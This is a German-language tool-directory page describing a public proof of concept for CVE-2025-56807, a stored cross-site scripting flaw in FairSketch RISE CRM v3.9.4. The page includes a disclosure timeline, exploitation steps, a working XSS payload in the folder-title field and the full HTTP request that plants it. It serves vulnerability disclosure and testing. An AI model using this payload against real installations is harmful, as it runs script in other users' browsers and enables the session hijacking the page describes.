Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-56807 — Proof-of-concept für eine gespeicherte XSS-Schwachstelle in FairSketch RISE Ultimate Project Manager & CRM v3.9.4, die die Ausführung beliebigen JavaScripts durch Ordner-Titel-Injektion demonstriert. | Kitploit
Tools/GitHubGitHub/aqwainfosec/cve-2025-56807
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubaqwainfosec/cve-2025-56807

CVE-2025-56807

Proof-of-concept für eine gespeicherte XSS-Schwachstelle in FairSketch RISE Ultimate Project Manager & CRM v3.9.4, die die Ausführung beliebigen JavaScripts durch Ordner-Titel-Injektion demonstriert.

Repository anzeigen
1vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-56807

Beschreibung

Eine Stored Cross-Site-Scripting (XSS)-Schwachstelle wurde in FairSketch RISE Ultimate Project Manager & CRM (v3.9.4) in der Dateimanager-Funktionalität entdeckt. Die Schwachstelle liegt im title-Parameter, der beim Erstellen neuer Ordner übermittelt wird. Aufgrund unzureichender Eingabebereinigung kann ein Angreifer HTML/JavaScript-Payloads (z. B. <details/open/ontoggle=prompt(origin)>) injizieren. Der Payload wird im Ordnernamen gespeichert und beim Auflisten von Ordnern im Dateimanager ausgeführt, wodurch die Ausführung beliebigen JavaScript-Codes im Browser jedes Benutzers ermöglicht wird, der den betroffenen Ordner ansieht. Dies kann zu Session-Hijacking und Datenexfiltration führen.

[!NOTE]
Diese Schwachstelle betrifft nicht nur Administratorkonten. Sie kann mit jedem Benutzerkonto ausgenutzt werden, das die Berechtigung zum Erstellen neuer Ordner im Dateimanager hat.

Offenlegungszeitplan

  • Zugewiesene CVE-ID: CVE-2025-56807
  • Entdeckung: Juli 2025 (von Aqwa Hameed)
  • Hersteller benachrichtigt: E-Mail an Fairsketch-Support
  • Antwort: Vom Hersteller am 22. Juli 2025 bestätigt

Proof of Concept (PoC)

  1. Melden Sie sich mit gültigen Anmeldedaten an.

  2. Navigieren Sie zu Files

    Dashboard

  3. Klicken Sie auf Neuer Ordner

    Dateimanager

  4. Geben Sie den folgenden Payload in das Titel-Feld ein:

<details/open/ontoggle=prompt(origin)>

Ordnertitel

  1. Laden Sie die Dateimanager-Seite neu, um den Payload auszulösen

    Payload-Ausführung

Request

POST /index.php/clients/save_folder HTTP/1.1
Host: rise.fairsketch.com
Cookie: [redacted]
Content-Length: 99
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: [redacted]
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://rise.fairsketch.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

id=&parent_id=&context=client&context_id=101&title=%3Cdetails%2Fopen%2Fontoggle%3Dprompt(origin)%3E
Tool herunterladen